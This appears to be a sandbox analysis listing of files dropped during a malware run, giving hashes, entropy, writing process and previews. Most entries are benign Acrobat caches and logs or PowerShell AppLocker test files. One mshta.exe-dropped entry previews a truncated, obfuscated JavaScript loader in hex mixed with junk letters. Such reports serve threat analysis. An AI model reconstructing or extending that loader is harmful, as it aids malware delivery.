                                                                      SHA1:CA98EA6E9AC8DAB6C864DD91E434A89D3579F07A
                                                                      SHA-256:95A10BF91ADB658021DE6CF95154D56A984BB1C62BDA177F77204DDB7302F344
                                                                      SHA-512:B5EC48DE30798E4A9953428C9F33602413EAA464574626F4978393FB7038FA9395E0B0EFA4621C63ABFEB698E6B8648A3FF9BC5E2FE5AE1579ED99076B38A71A
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):282
                                                                      Entropy (8bit):5.301373598626118
                                                                      Encrypted:false
                                                                      SSDEEP:6:YEQXJ2HX4SzgcnlWsGiIPEeOF0YaaJqoAvJTqgFCrPeUkwRe9:YvXKX43sMsdTeO6anGTq16Ukee9
                                                                      MD5:EE185CAA6DE707284DBAC74935F22510
                                                                      SHA1:2402F029D8E443BDA7067B84DDC886AE4CED6689
                                                                      SHA-256:1166C74EAC441FBB0E089EFF7594630F5DF1177399B9032F4F72BF0D89A62C1A
                                                                      SHA-512:51B7B60833D4464D0CCFD3085CAD1B8C9B60510BE05729C2F8F52F24C84C5DFC6E8900E0F885D9EFE353308A837EC11433BD3BA1906847C0644B20F0C2BDDBFD
                                                                      Malicious:false
                                                                      Preview:{"analyticsData":{"responseGUID":"1c8cf819-c0a6-47ad-b129-90360360bd5b","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1735464743429,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):4
                                                                      Entropy (8bit):0.8112781244591328
                                                                      Encrypted:false
                                                                      SSDEEP:3:e:e
                                                                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                      Malicious:false
                                                                      Preview:....
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):2814
                                                                      Entropy (8bit):5.143867690477688
                                                                      Encrypted:false
                                                                      SSDEEP:24:YNWwL4atUaySb9HvmGE6zHRX6uELVWmLwGQWVjI7zBsj0SQi0PHYD0nv2yPy2LSS:YNrXN68/wW+sQDOJy/Qx4yHGAh9tGC
                                                                      MD5:0F5F408000F0D52B54CA29D3CDE652BA
                                                                      SHA1:1B32349A74B03F622650F98BD014B27EA64318B1
                                                                      SHA-256:565A15D39039990DA3668BA633E4141C8125561D6A65813123FFFD0D83683F74
                                                                      SHA-512:A3161D6004D33544AA1E7F7775020DFC611DB9370F78CB164739DBA3C449C01132AE0B802F191CC8F3C858C25F7D2739E0E7C144FBFD54A8E39B1F6635AADDEC
                                                                      Malicious:false
                                                                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"4bcc01950914774879f175861ef69a5d","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1735290486000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"c88ae6300812c73e8d0ee0e534f01ddd","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1735290486000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"7a017d6260d78fd34e507c0b606038ab","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1735290486000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"dd64734b0987de609e3658919aa00690","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1735290486000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"7fa9c6250ccdb42fe6995a24396e8975","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1735290486000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"54ef741408286f28f22e0184473a5dc4","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                      Category:dropped
                                                                      Size (bytes):12288
                                                                      Entropy (8bit):1.4526681512947004
                                                                      Encrypted:false
                                                                      SSDEEP:48:TGufl2GL7msCvrBd6dHtbGIbPe0K3+fDy2dsU3qOly3qo:lNVmsw3SHtbDbPe0K3+fDZd3aV
                                                                      MD5:24477D415280D9E92F933DEFF283FF33
                                                                      SHA1:AD4146C65F5E9ACB0793D656CA6B61BCF1D8ED81
                                                                      SHA-256:72BBCDA49E2FDA130C679A20FC05AD6977B790E81302EBE2F9F04A6C6B294491
                                                                      SHA-512:70669782DAE71CEF6D175C34A6D9EC292C45956145521230DCFB6D22449CC4544C110B514D529996FF17B2465E4A96722EC561E847970E0A1EB18834BEE98864
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:SQLite Rollback Journal
                                                                      Category:dropped
                                                                      Size (bytes):8720
                                                                      Entropy (8bit):1.9584263586487158
                                                                      Encrypted:false
                                                                      SSDEEP:48:7MyrvrBd6dHtbGIbPe0K3+fDy2dsU3q/3qFl2GL7msO:7D3SHtbDbPe0K3+fDZd3gKVmsO
                                                                      MD5:30C1BB9678068385217E8119EA181F5F
                                                                      SHA1:1450112534AEF9DB4170358229F459BC84629A9B
                                                                      SHA-256:2311771B66F81C9D57CA80B6AAE5AFDD1D7A1850D9290515CD5B2B8C1BE1FB72
                                                                      SHA-512:1261AFFC28631EA22F19CADE5806AE75BD474E5F987BE8D50692CEDB47028A9EF8D94F26E03772605C1ED6B92D342D8082FE53181979C15B998BC71F5B8D51AC
                                                                      Malicious:false
                                                                      Preview:.... .c......*}N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................v.../.././././....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):66726
                                                                      Entropy (8bit):5.392739213842091
                                                                      Encrypted:false
                                                                      SSDEEP:768:RNOpblrU6TBH44ADKZEgWbjZndAdNVYxXRdOPP3Ea29gYyu:6a6TZ44ADEWbjZGdHY5RdyBK
                                                                      MD5:156C6C333F9C7CB9D6D0300077B91474
                                                                      SHA1:3B4939645E720F7D98ED39830B68E4C33A4C5111
                                                                      SHA-256:0933300D634C180CF95141AEA76B6BCDCC4AED21746E5AF51119A58480E173A1
                                                                      SHA-512:F39635E12250D9F14CA80E271B1D29E671A053E58C80E328AD5B60D0C42AFDA73C917255CA4629A5B2155D4F6C816E96017CD0761C6CAE9DB3B0844BE311C611
                                                                      Malicious:false
                                                                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                      Process:C:\Windows\System32\mshta.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):497355
                                                                      Entropy (8bit):6.2697576364001515
                                                                      Encrypted:false
                                                                      SSDEEP:6144:YUT2/hKdAxeNSYneIelFeYU3+ejQdefeFdAepSjUbeXeTkeMe/:v0hKq
                                                                      MD5:CB3ECBABD5A956664E03CBE4270418C6
                                                                      SHA1:6B7915B233B5E30C8B6ACA23013735A9F33DDA3F
                                                                      SHA-256:9355A7BC59AF4AB0AE04ABE2EAE7984BCEDE654F5E46302686F381E678D20615
                                                                      SHA-512:53AEEB6F6AF1BF767FF6C303DB786B91BA0B4A8F8DFCAFF44935FE8F5642D594ACA39BBC8229B8971C033A158BFE0880541CA158EEB88BF29BE2CCE1AAA0947C
                                                                      Malicious:false
                                                                      Preview:66T75e6eF63b74B69A6fg6eU20a69L68f71E4cV6eb28G76p71R73M55p43c29r7bz76i61Q72D20V50a4eT72N65K6fT79l3dD20h27t27N3bZ66M6fx72l20y28v76c61P72P20m6cX65s51v43f61F20K3dk20H30q3bU6cv65p51X43f61Z20M3cH20P76r71t73A55n43h2et6cP65E6eO67E74e68v3bW20T6cA65Q51y43h61Y2bh2bF29I7bB76w61q72Z20R56k58o58R5aL6bm68o20N3dX20V53m74j72L69B6eP67B2ew66g72d6fu6dx43c68o61H72h43r6fn64Z65K28j76s71D73x55I43c5bf6cP65w51s43s61H5dI20v2df20e39O32W31X29S3bD50M4eV72T65v6fb79o20v3dh20k50U4ey72O65D6fn79d20i2bm20D56Y58k58l5az6bo68l7dn72o65g74J75c72S6eU20Q50H4eG72X65X6fk79B7dg3bo76j61h72M20X50t4es72F65I6fC79v20c3dT20y69h68S71N4ch6ei28I5bn31H30m33F33R2cA31h30H33w32Q2cF31y30l34W30k2cA31E30m32Q32r2cu31i30Y33H35h2cq31A30R33Z36o2cJ31p30B32s35t2cg31x30c32v32X2cL31l30I32r39w2cx31r30x32O39h2cN39a36Q37r2cN31E30j32e32Y2ca31z30Q34h31I2cG31P30w32s32d2cE39D35b33r2ct39f36J36a2ch31L30j34z30D2cD39s35a33j2cZ39K37e30p2cx39S35E33U2cX39v36D36A2ck31g30A32y32T2cJ31d30m33j33X2cL39E35d33B2cT31o30b30v36M2co31i30X33q31l2cN31o30H33k35W2cX31V30j32F32Z2cw31f3
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):11887
                                                                      Entropy (8bit):4.901437212034066
                                                                      Encrypted:false
                                                                      SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdR2Ca6pZlbjvwRjdHPRhAgkjDt4iWN3yBGHVQ9sY:Srib4ZoopbjvwRjdvRNkjh4iUxsNYW6m
                                                                      MD5:DDAC12D6036E986FE7B5A5E062A8CC14
                                                                      SHA1:FA891410075C9E647754E894CDCB14751FE9E3C7
                                                                      SHA-256:B3B4B4AF761334818B7924740A84E55CE8ECA480F13077854469E8D9C7C1DF7E
                                                                      SHA-512:F7BD65E3B361D0F02B541273A6D99BD1F6B438F2304D4F061C262164166E4FAB6F56614CFD1C44A0D99C9E1A1B46D5DF0138A4656F96B7390162F54E1679B776
                                                                      Malicious:false
                                                                      Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):0.34726597513537405
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlll:Nll
                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                      Malicious:false
                                                                      Preview:@...e...........................................................
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):246
                                                                      Entropy (8bit):3.5162684137903053
                                                                      Encrypted:false
                                                                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K87kwCH:Qw946cPbiOxDlbYnuRKTl
                                                                      MD5:2B8AC352D5918C0ABD844B07E3B7647C
                                                                      SHA1:EB4C4827CE0A1B76F41BD5508BF2F4630C4F77B9
                                                                      SHA-256:0DE52E6D9E809B7F68771203E51ECD942C49C12226B87212E23AF2F9D8FE4C03
                                                                      SHA-512:D16DCBDD07659129491C96E7EF31ED8001A7F67453A99070084980C898297596D96223FE99E6D03B25A6AD21150BD7194EFFA502B00CF3A4680BE6F5A5E09D16
                                                                      Malicious:false
                                                                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.7./.1.2./.2.0.2.4. . .0.4.:.0.8.:.0.3. .=.=.=.....
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with very long lines (393)
                                                                      Category:dropped
                                                                      Size (bytes):16525
                                                                      Entropy (8bit):5.386483451061953
                                                                      Encrypted:false
                                                                      SSDEEP:384:A2+jkjVj8jujXj+jPjghjKj0jLjmF/FRFO7t75NsXNsbNsgNssNsNNsaNsliNsTY:AXg5IqTS7Mh+oXChrYhFiQHXiz1W60ID
                                                                      MD5:F49CA270724D610D1589E217EA78D6D1
                                                                      SHA1:22D43D4BB9BDC1D1DEA734399D2D71E264AA3DD3
                                                                      SHA-256:D2FFBB2EF8FCE09991C2EFAA91B6784497E8C55845807468A3385CF6029A2F8D
                                                                      SHA-512:181B42465DE41E298329CBEB80181CBAB77CFD1701DBA31E61B2180B483BC35E2EFAFFA14C98F1ED0EDDE67F997EE4219C5318CE846BB0116A908FB2EAB61D29
                                                                      Malicious:false
                                                                      Preview:SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:808+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f1c78126-6a87-4f56-987d-4547733fd5ac.1696492435808 Timestamp=2023-10-05T09:53:55:809+0200 ThreadID=6044 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):15114
                                                                      Entropy (8bit):5.348230321095999
                                                                      Encrypted:false
                                                                      SSDEEP:384:3Sk7D9i7Z+31ecYtfk7KuFc/rxkmcthKkHlhrXboenLLRYZKkN6E8x8xUd3qMRJz:QW5
                                                                      MD5:F67EB2D9536626EE4820C7B86893184E
                                                                      SHA1:ED8ED076DC87A44352469F33B635E1B4D7E47226
                                                                      SHA-256:ED88DB405C5F2C0E528589ED314A60116C4A718A2C52CB622F33E7EECA1E71A7
                                                                      SHA-512:18E6EA92B4EB62C7BC5545FF3FEBA89E5783453BE5B889F74EF47558A6A9090477AC36DDB60E092FBAF9887EB548F171DC33957ECA9864C60F28EB98BF4D8FEE
                                                                      Malicious:false
                                                                      Preview:SessionID=485d72fe-cfd2-4853-9e30-0e65c9b6f509.1735290477802 Timestamp=2024-12-27T04:07:57:802-0500 ThreadID=8048 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=485d72fe-cfd2-4853-9e30-0e65c9b6f509.1735290477802 Timestamp=2024-12-27T04:07:57:819-0500 ThreadID=8048 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=485d72fe-cfd2-4853-9e30-0e65c9b6f509.1735290477802 Timestamp=2024-12-27T04:07:57:819-0500 ThreadID=8048 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=485d72fe-cfd2-4853-9e30-0e65c9b6f509.1735290477802 Timestamp=2024-12-27T04:07:57:820-0500 ThreadID=8048 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=485d72fe-cfd2-4853-9e30-0e65c9b6f509.1735290477802 Timestamp=2024-12-27T04:07:57:823-0500 ThreadID=8048 Component=ngl-lib_NglAppLib Description="SetConf
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):35721
                                                                      Entropy (8bit):5.409047487043618
                                                                      Encrypted:false
                                                                      SSDEEP:768:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRldy0+AyxkHBDgRh9gR/:hRDD/ATOlQwlgR6RgRT4xk1Bh9+R6gRJ
                                                                      MD5:0E4FC5713C83B5D2EA3107E4B8CEDF02
                                                                      SHA1:E83718C25FD771D5D9182904AD67CD18157CC530
                                                                      SHA-256:5FDCC383EAB92122C63E150457AA7D990E32F3A0DEDFD306F8898F5C2BAEF104
                                                                      SHA-512:13BCED3D12E26C8EC2930EF051ABEC9D198631FA662DFAB97B88850C9677AF9FD2C16809B626ED55B7291302552E57A41A64BBC1CA3F07C7BCDFB22ED23C971F
                                                                      Malicious:false
                                                                      Preview:05-10-2023 08:41:17:.---2---..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:41:17:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:41:17:.Closing File..05-10-
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                      Category:dropped
                                                                      Size (bytes):1407294
                                                                      Entropy (8bit):7.97605879016224
                                                                      Encrypted:false
                                                                      SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                      MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                      SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                      SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                      SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                      Malicious:false
                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                      Category:dropped
                                                                      Size (bytes):758601
                                                                      Entropy (8bit):7.98639316555857
                                                                      Encrypted:false
